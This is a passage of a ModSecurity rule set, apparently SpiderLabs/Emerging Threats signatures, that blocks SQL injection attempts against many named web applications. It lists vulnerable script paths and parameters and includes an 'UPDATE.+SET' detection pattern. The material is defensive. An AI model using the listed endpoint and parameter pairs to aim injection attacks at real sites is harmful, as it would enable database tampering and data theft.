(aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp category UPDATE SecRule REQUEST_LINE "@contains /search_listing.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006765,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp category UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21199'" SecRule &TX:'/SQL_INJECTION.*ARGS:category/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp category UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006771) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp agent UPDATE SecRule REQUEST_LINE "@contains /search_listing.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006771,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp agent UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21199'" SecRule &TX:'/SQL_INJECTION.*ARGS:agent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp agent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006777) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- detail.asp property_id UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006777,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- detail.asp property_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21199'" SecRule &TX:'/SQL_INJECTION.*ARGS:property_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- detail.asp property_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004646) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE SecRule REQUEST_LINE "@contains /news.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004646,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/4040/'" SecRule &TX:'/SQL_INJECTION.*ARGS:news_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004127) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Katalog Plyt Audio SQL Injection Attempt -- index.php kolumna UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004127,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Katalog Plyt Audio SQL Injection Attempt -- index.php kolumna UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3513/'" SecRule &TX:'/SQL_INJECTION.*ARGS:kolumna/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Katalog Plyt Audio SQL Injection Attempt -- index.php kolumna UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004984) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid UPDATE SecRule REQUEST_LINE "@contains /forum.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004984,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3278/'" SecRule &TX:'/SQL_INJECTION.*ARGS:forumid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005801) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Kolayindir Download (Yenionline) SQL Injection Attempt -- down.asp id UPDATE SecRule REQUEST_LINE "@contains /down.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005801,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Kolayindir Download (Yenionline) SQL Injection Attempt -- down.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21889'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Kolayindir Download (Yenionline) SQL Injection Attempt -- down.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004694) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Kubix SQL Injection Attempt -- index.php member_id UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004694,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Kubix SQL Injection Attempt -- index.php member_id UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/2863/'" SecRule &TX:'/SQL_INJECTION.*ARGS:member_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Kubix SQL Injection Attempt -- index.php member_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005074) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Michelles L2J Dropcalc SQL Injection Attempt -- i-search.php itemid UPDATE SecRule REQUEST_LINE "@contains /i-search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005074,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Michelles L2J Dropcalc SQL Injection Attempt -- i-search.php itemid UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3232/'" SecRule &TX:'/SQL_INJECTION.*ARGS:itemid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Michelles L2J Dropcalc SQL Injection Attempt -- i-search.php itemid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005978) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- journal.php w UPDATE SecRule REQUEST_LINE "@contains /journal.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005978,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- journal.php w UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/455495/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:w/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- journal.php w UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006320) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- polls.php id UPDATE SecRule REQUEST_LINE "@contains /polls.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006320,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- polls.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21366'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- polls.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004528) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LI-Guestbook SQL Injection Attempt -- guestbook.php country UPDATE SecRule REQUEST_LINE "@contains /guestbook.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004528,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS LI-Guestbook SQL Injection Attempt -- guestbook.php country UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22821'" SecRule &TX:'/SQL_INJECTION.*ARGS:country/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LI-Guestbook SQL Injection Attempt -- guestbook.php country UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007299) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp id UPDATE SecRule REQUEST_LINE "@contains /inout/status.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007299,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007305) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp id UPDATE SecRule REQUEST_LINE "@contains /inout/update.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007305,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007311) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp id UPDATE SecRule REQUEST_LINE "@contains /forgotpass.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007311,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007317) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp uid UPDATE SecRule REQUEST_LINE "@contains /forgotpass.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007317,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp uid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:uid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp uid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007323) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp uid UPDATE SecRule REQUEST_LINE "@contains /inout/update.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007323,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp uid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:uid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp uid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007329) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp uid UPDATE SecRule REQUEST_LINE "@contains /inout/status.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007329,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp uid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:uid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp uid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007335) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- details.asp id UPDATE SecRule REQUEST_LINE "@contains /details.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007335,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- details.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2846'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- details.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006662) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LINK Content Management Server (CMS) SQL Injection Attempt -- navigacija.php IDMeniGlavni UPDATE SecRule REQUEST_LINE "@contains /navigacija.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006662,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LINK Content Management Server (CMS) SQL Injection Attempt -- navigacija.php IDMeniGlavni UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21464'" SecRule &TX:'/SQL_INJECTION.*ARGS:IDMeniGlavni/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LINK Content Management Server (CMS) SQL Injection Attempt -- navigacija.php IDMeniGlavni UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006668) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LINK Content Management Server (CMS) SQL Injection Attempt -- prikazInformacije.php IDStranicaPodaci UPDATE SecRule REQUEST_LINE "@contains /prikazInformacije.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006668,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LINK Content Management Server (CMS) SQL Injection Attempt -- prikazInformacije.php IDStranicaPodaci UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21464'" SecRule &TX:'/SQL_INJECTION.*ARGS:IDStranicaPodaci/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LINK Content Management Server (CMS) SQL Injection Attempt -- prikazInformacije.php IDStranicaPodaci UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007367) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- linkslist.asp psearch UPDATE SecRule REQUEST_LINE "@contains /linkslist.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007367,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- linkslist.asp psearch UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452256/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:psearch/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- linkslist.asp psearch UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007373) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- search.asp UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007373,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- search.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452256/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Link Exchange Lite SQL Injection Attempt -- search.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004414) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Links Management Application SQL Injection Attempt -- index.php lcnt UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004414,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Links Management Application SQL Injection Attempt -- index.php lcnt UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3416/'" SecRule &TX:'/SQL_INJECTION.*ARGS:lcnt/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Links Management Application SQL Injection Attempt -- index.php lcnt UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006478) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid UPDATE SecRule REQUEST_LINE "@contains /categoria.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006478,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/4082/'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005834) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LocazoList SQL Injection Attempt -- main.asp subcatID UPDATE SecRule REQUEST_LINE "@contains /main.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005834,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LocazoList SQL Injection Attempt -- main.asp subcatID UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3073/'" SecRule &TX:'/SQL_INJECTION.*ARGS:subcatID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LocazoList SQL Injection Attempt -- main.asp subcatID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006326) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Lotfian Request For Travel SQL Injection Attempt -- ProductDetails.asp PID UPDATE SecRule REQUEST_LINE "@contains /ProductDetails.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006326,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Lotfian Request For Travel SQL Injection Attempt -- ProductDetails.asp PID UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/2908/'" SecRule &TX:'/SQL_INJECTION.*ARGS:PID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Lotfian Request For Travel SQL Injection Attempt -- ProductDetails.asp PID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004966) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LushiNews SQL Injection Attempt -- comments.php id UPDATE SecRule REQUEST_LINE "@contains /comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004966,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LushiNews SQL Injection Attempt -- comments.php id UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3287/'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LushiNews SQL Injection Attempt -- comments.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004972) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LushiWarPlaner SQL Injection Attempt -- register.php id UPDATE SecRule REQUEST_LINE "@contains /register.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004972,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LushiWarPlaner SQL Injection Attempt -- register.php id UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3288/'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LushiWarPlaner SQL Injection Attempt -- register.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005140) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXdev MDPro SQL Injection Attempt -- index.php startrow UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005140,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MAXdev MDPro SQL Injection Attempt -- index.php startrow UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22293'" SecRule &TX:'/SQL_INJECTION.*ARGS:startrow/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXdev MDPro SQL Injection Attempt -- index.php startrow UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005517) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MGB OpenSource Guestbook SQL Injection Attempt -- email.php id UPDATE SecRule REQUEST_LINE "@contains /email.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005517,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MGB OpenSource Guestbook SQL Injection Attempt -- email.php id 